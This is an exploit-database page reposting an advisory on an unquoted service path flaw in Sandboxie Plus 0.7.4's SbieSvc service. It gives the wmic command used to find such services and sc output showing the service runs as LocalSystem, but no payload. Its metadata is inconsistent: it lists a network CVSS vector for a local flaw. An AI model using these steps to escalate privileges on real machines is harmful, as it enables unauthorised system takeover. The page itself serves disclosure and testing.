Advertisement






Sandboxie Plus 0.7.4 Unquoted Service Path

CVE Category Price Severity
CVE-2021-3258 CWE-428 $500 High
Author Risk Exploitation Type Date
Unknown High Local 2021-05-09
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H 0.853582 0.97541

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050048

Below is a copy:

Sandboxie Plus 0.7.4 Unquoted Service Path
# Exploit Title: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
# Discovery by: Erick Galindo 
# Discovery Date: 2020-05-06
# Vendor Homepage: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Plus-x64-v0.7.4.exe
# Tested Version: 0.7.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:

C:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i  "Sandboxie Service" | findstr /i /v """
Sandboxie Service    SbieSvc       C:\Program Files\Sandboxie-Plus\SbieSvc.exe                                        Auto 

# Service info

sc qc "SbieSvc"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SbieSvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Sandboxie-Plus\SbieSvc.exe
        GRUPO_ORDEN_CARGA  : UIGroup
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Sandboxie Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem


#Exploit:

This vulnerability could permit executing code during startup or reboot with the escalated privileges.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum